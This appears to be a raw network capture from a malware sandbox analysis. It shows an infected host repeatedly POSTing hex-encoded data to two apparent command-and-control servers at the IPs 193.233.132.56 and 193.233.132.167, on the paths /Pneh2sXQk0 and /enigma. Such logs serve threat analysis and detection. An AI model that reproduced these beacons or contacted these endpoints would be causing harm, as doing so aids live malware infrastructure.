                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:56.415338993 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1518        192.168.2.5  51374        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:56.172810078 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:56.425393105 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1519        192.168.2.5  51375        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:56.669473886 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:56.921344042 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1520        192.168.2.5  51376        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:56.761064053 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:57.007370949 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1521        192.168.2.5  51378        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:57.261265993 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:57.514024973 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1522        192.168.2.5  51377        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:57.261392117 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:57.510546923 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1523        192.168.2.5  51379        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:57.762088060 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:58.015448093 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1524 | 192.168.2.5 | 51380 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:57.838288069 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:58.086596966 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1525 | 192.168.2.5 | 51381 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:58.338505030 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:58.591551065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1526 | 192.168.2.5 | 51382 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:58.351716995 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:58.599088907 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1527 | 192.168.2.5 | 51383 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:58.852525949 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:59.106630087 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1528 | 192.168.2.5 | 51384 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:58.913249016 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:59.159167051 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1529 | 192.168.2.5 | 51385 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:59.408163071 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:59.657711983 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1530 | 192.168.2.5 | 51386 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:59.447603941 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:59.693651915 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1531 | 192.168.2.5 | 51387 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:59.945117950 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:00.196602106 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1532 | 192.168.2.5 | 51388 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:59.974358082 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:00.217288971 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1533 | 192.168.2.5 | 51389 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:00.469324112 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:37:00.721677065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1534 | 192.168.2.5 | 51390 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:00.527087927 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:37:00.775468111 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1535 | 192.168.2.5 | 51391 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:37:01.028166056 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:37:01.278172970 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1536 | 192.168.2.5 | 51392 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:01.039562941 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
